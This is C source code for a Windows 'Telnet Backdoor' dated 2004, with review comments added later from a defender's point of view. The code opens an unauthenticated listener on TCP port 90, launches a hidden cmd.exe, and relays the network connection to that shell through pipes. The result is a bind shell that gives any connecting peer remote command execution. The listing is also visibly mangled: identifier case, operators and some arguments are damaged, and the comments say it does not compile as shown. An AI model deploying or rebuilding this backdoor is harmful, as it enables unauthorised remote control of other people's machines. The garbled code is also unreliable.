/*************************************** *************
Created: 2004/10/09
Created: am, am
File base: ini
File Ext: c
Author: Xuefeng
Purpose: Telnet Backdoor
**************************************** ************/
# Include <stdio. h>
# Include <winsock2.h>
# Pragma comment (Lib, "ws2_32.lib ")
# Pragma comment (Lib, "kernel32.lib ")
# Define Port 90
// Process-wide state shared by main and the two worker threads.
// NOTE(review): this listing is extraction-damaged (identifier case and
// spacing are mangled), so it does not compile as shown. The comments describe
// only what the visible calls indicate.
// Listening socket, and the most recently accepted client socket.
Socket serversocket = invalid_socket;
Socket clientsocket = invalid_socket;
// Ends of the two anonymous pipes that sit between the network socket and the
// spawned command interpreter's standard handles.
Handle hreadpipe, hwritepipe, hwritefile, hreadfile;
// Ready flags: each worker thread sets its flag to 1 once its pipe exists;
// main clears both before starting the threads and then polls them.
Unsigned char VARA, varb;
// Worker thread A: network -> shell input.
// Creates the pipe whose read end (hreadpipe) main later installs as the child
// process's standard input, then copies whatever arrives on clientsocket into
// the write end (hwritefile).
// lpparam is unused. The loop never exits, so "Return 0" is not reached.
// Defender note: the bytes are forwarded without any authentication step, so
// any peer that can reach the listening port is feeding the shell's stdin.
DWORD winapi threadfunca (lpvoid lpparam)
{
Security_attributes pipeattr;
DWORD nbytetowrite, nbytewritten;
Char recv_buff [1024];
Pipeattr. nlength = sizeof (security_attributes );
Pipeattr. lpsecuritydescriptor = NULL;
// Inheritable handles: this is what lets the child created in main use the
// pipe ends as its standard handles.
Pipeattr. binherithandle = true;
// Create the anonymous pipe (the original comment's "MPS queue" appears to be
// a mistranslation of "pipe").
Createpipe (& hreadpipe, & hwritefile, & pipeattr, 0 );
// Signal main that this thread's pipe is ready.
Vara = 1;
While (true)
{
Sleep (250 );
// clientsocket is the global that main overwrites on every accept().
// NOTE(review): the recv result is used as the write length without being
// checked for an error or a closed connection.
Nbytetowrite = Recv (clientsocket, recv_buff, 1024, 0 );
Writefile (hwritefile, recv_buff, nbytetowrite, & nbytewritten, null );
}
Return 0;
}
// Worker thread B: shell output -> network.
// Creates the pipe whose write end (hwritepipe) main later installs as the
// child's standard output and standard error, then relays everything read from
// the read end (hreadfile) to clientsocket.
// lpparam is unused. The loop never exits, so "Return 0" is not reached.
// Defender note: command output leaves the host as plain bytes on the TCP
// connection; no encryption or framing is applied in this listing.
DWORD winapi threadfuncb (lpvoid lpparam)
{
Security_attributes pipeattr;
DWORD Len;
Char send_buff [25000];
Pipeattr. nlength = sizeof (security_attributes );
Pipeattr. lpsecuritydescriptor = NULL;
// Inheritable handles, so the child process can write into this pipe.
Pipeattr. binherithandle = true;
Createpipe (& hreadfile, & hwritepipe, & pipeattr, 0 );
// Signal main that this thread's pipe is ready.
Varb = 1;
While (true)
{
// "hread file" is extraction damage; presumably the global hreadfile - confirm
// against an undamaged copy.
Readfile (hread file, send_buff, 25000, & Len, null );
// Forward exactly the Len bytes that were read to the current client socket.
Send (clientsocket, send_buff, Len, 0 );
}
Return 0;
}
// Entry point. In order, the visible code:
//   1. opens a TCP listener on all interfaces on the port from the Port define,
//   2. starts the two relay threads and waits for their pipes,
//   3. launches a hidden command interpreter whose stdin/stdout/stderr are the
//      pipe ends,
//   4. loops forever accepting connections.
// Defender view: the observable artifacts are an unexpected TCP listener
// (Port is defined as 90 at the top of the file) and a command interpreter
// started with a hidden window and redirected, inherited standard handles by
// the process that owns that listener. Nothing in the listing authenticates the
// peer.
Void main (void)
{
// "Wsadata;" has lost its variable name in extraction; presumably a WSADATA
// variable named wsadata, as used in the WSAStartup call below.
Wsadata;
Struct sockaddr_in remoteaddr;
DWORD dwthreadida, dwthreadidb, dwthreadparam = 0;
Osversioninfo osvi;
Process_information processinfo;
Startupinfo startinfo;
Char szapp [256];
// Initialise Winsock 2.2 and create the listening TCP socket.
Wsastartup (makeword (2, 2), & wsadata );
Serversocket = socket (af_inet, sock_stream, ipproto_tcp );
Remoteaddr. sin_family = af_inet;
Remoteaddr. sin_port = htons (port );
// inaddr_any: the listener is bound on every local interface.
Remoteaddr. sin_addr.s_un.s_addr = htonl (inaddr_any );
BIND (serversocket, (lpsockaddr) & remoteaddr, sizeof (remoteaddr ));
Listen (serversocket, 5 );
// Clear the ready flags, start both relay threads, then poll every 250 ms.
Vara = 0;
Varb = 0;
Createthread (null, 0, threadfunca, null, 0, & dwthreadida );
Createthread (null, 0, threadfuncb, null, 0, & dwthreadidb );
Do
{
Sleep (250 );
// Loop condition is garbled; presumably it waits until the threads have set
// their flags, i.e. until the pipes exist - confirm against an undamaged copy.
} While (VARA | varb) = 0 );
Getstartupinfo (& startinfo );
// Configure the child: use the explicit show-window value and the explicit
// standard handles set below.
Startinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
// stdin comes from thread A's pipe; stdout and stderr both go to thread B's.
Startinfo. hstdinput = hreadpipe;
Startinfo. hstderror = hwritepipe;
Startinfo. hstdoutput = hwritepipe;
// sw_hide: the child gets no visible window.
Startinfo. wshowwindow = sw_hide;
Osvi. dwosversioninfosize = sizeof (osversioninfo );
Getversionex (& osvi );
// szapp receives the system directory; the interpreter name is appended below.
Getsystemdirectory (szapp, max_path + 1 );
// Platform check ("=" is presumably "==" before the damage). In the Windows
// SDK, platform id 2 is VER_PLATFORM_WIN32_NT.
If (osvi. dwplatformid = 2)
{
Strcat (szapp, "// cmd.exe ");
// NOTE(review): this argument list looks truncated by extraction; the final
// two arguments are the startup info and the process-information output.
If (CreateProcess (szapp, null, true, 0, null, null, & startinfo,
& Processinfo) = 0)
{
Printf ("create process error! /N ");
Return;
}
}
Else
{
// Other platforms: command.exe is appended instead, and szapp is passed as
// the command line rather than as the application name.
Strcat (szapp, "// command.exe ");
CreateProcess (null, szapp, 0, 0, true, 0, 0, 0, & startinfo, & processinfo );
}
// Accept loop: each accepted connection overwrites the global clientsocket
// that both relay threads use. The interpreter was started once, above, so
// every connection is attached to that same process. The previous socket is
// not closed here.
While (true)
{
Clientsocket = accept (serversocket, null, null );
Sleep (250 );
}
}